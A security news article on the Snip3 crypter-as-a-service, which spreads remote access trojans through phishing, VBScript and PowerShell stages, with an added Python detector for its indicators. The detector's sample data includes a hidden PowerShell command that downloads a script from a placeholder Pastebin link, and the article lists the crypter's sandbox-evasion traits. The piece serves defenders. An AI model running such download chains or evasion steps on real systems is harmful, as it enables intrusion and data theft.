
Snip3: A New Crypter-as-a-Service that Deploys Multiple RATs

The newly discovered Crypter-as-a-Service, dubbed “Snip3,” is used to deploy Revenge RAT, Agent Tesla, AsyncRAT, and NetWire RAT payloads on compromised systems.


Microsoft discovered a spear-phishing campaign in the wild targeting airline, cargo, and travel industries with multiple Remote Access Trojans (RATs). The technology giant stated that attackers distributed malware payloads via phishing emails imitating legitimate businesses with malicious image and PDF attachments.

“The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads,” Microsoft said.

Stealthy Malware Loader

Threat actors use multiple RATs to exfiltrate sensitive data from critical systems and to stage additional malware payloads. According to cybersecurity firm Morphisec, the RATs are delivered by a new, stealthy malware loader sold as a Crypter-as-a-Service, which spreads them onto targeted machines.

The Crypter-as-a-Service, dubbed “Snip3,” is used to deploy Revenge RAT, Agent Tesla, AsyncRAT, and NetWire RAT payloads on compromised systems. Snip3 implements several advanced techniques to bypass detection, such as:

  • Executing PowerShell code with the RemoteSigned execution policy parameter
  • Checking for the presence of Windows Sandbox and VMware virtualization
  • Using Pastebin and top4top for staging
  • Compiling RunPE loaders on the endpoint at runtime

Once the malicious attachment is downloaded, the first-stage VBScript (VBS) file is installed and executes the second-stage PowerShell script, which in turn launches the final RAT payload using process hollowing.
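The delivery chain and evasion traits above translate directly into a detection: a script host spawning PowerShell, the RemoteSigned execution-policy override, and a download from a paste or file-hosting staging service. The following is an added example (not code from Morphisec or Microsoft) that scores constructed process-creation events against those three indicators and flags only events that combine at least two, so a lone RemoteSigned in legitimate admin use is not enough; the event records, hostnames and paths are constructed for illustration.

```python
import re

# Constructed sample process-creation events (parent -> child, command line),
# modelled on the Snip3 chain described in the article. Not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "outlook.exe", "image": "wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\u\\Downloads\\invoice.vbs"'},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -w hidden -Command "
                "\"Invoke-WebRequest https://pastebin.com/raw/PLACEHOLDER -OutFile s2.ps1\""},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1"},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

# Indicators drawn from the article: VBS first stage, RemoteSigned, Pastebin/top4top staging.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STAGING_HOSTS = re.compile(r"pastebin\.com|top4top", re.IGNORECASE)
REMOTESIGNED = re.compile(r"-(?:ExecutionPolicy|ep)\s+RemoteSigned", re.IGNORECASE)


def score_event(ev):
    """Return (score, reasons) for one process-creation event; only PowerShell is scored."""
    reasons = []
    if ev["image"].lower() != "powershell.exe":
        return 0, reasons
    cmd = ev["cmdline"]
    if ev["parent"].lower() in SCRIPT_HOSTS:
        reasons.append("powershell spawned by a script host (VBS first stage)")
    if REMOTESIGNED.search(cmd):
        reasons.append("execution policy overridden with RemoteSigned")
    if STAGING_HOSTS.search(cmd):
        reasons.append("download from a paste/file-hosting staging service")
    return len(reasons), reasons


def find_suspicious(events, threshold=2):
    """Flag events that combine at least `threshold` Snip3-like indicators."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in find_suspicious(SAMPLE_EVENTS):
        print(cmdline)
        for reason in reasons:
            print("  -", reason)
```

On the constructed events only the wscript-spawned PowerShell download is flagged; the administrator's RemoteSigned backup script scores one indicator and is left alone.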

“The Snip3 Crypter’s ability to identify sandboxing and virtual environments makes it especially capable of bypassing detection-centric solutions. As a result, organizations with detection-focused stacks need to be wary of attacks like Snip3 and others. Morphisec customers can rest easy that they are protected against the evasive techniques Snip3 and other attacks like it employ,” Morphisec said.

Microsoft Fixes 55 Flaws

In a recent development, Microsoft’s May Patch Tuesday security update addressed over 55 vulnerabilities, including four critically rated Zero-Day bugs. The now-patched Zero-Day vulnerabilities include CVE-2021-31204 (.NET and Visual Studio Elevation of Privilege Vulnerability), CVE-2021-31207 (Microsoft Exchange Server Security Feature Bypass Vulnerability), CVE-2021-31200 (Common Utilities Remote Code Execution Vulnerability), and CVE-2021-31166, which was flagged by the Zero Day Initiative.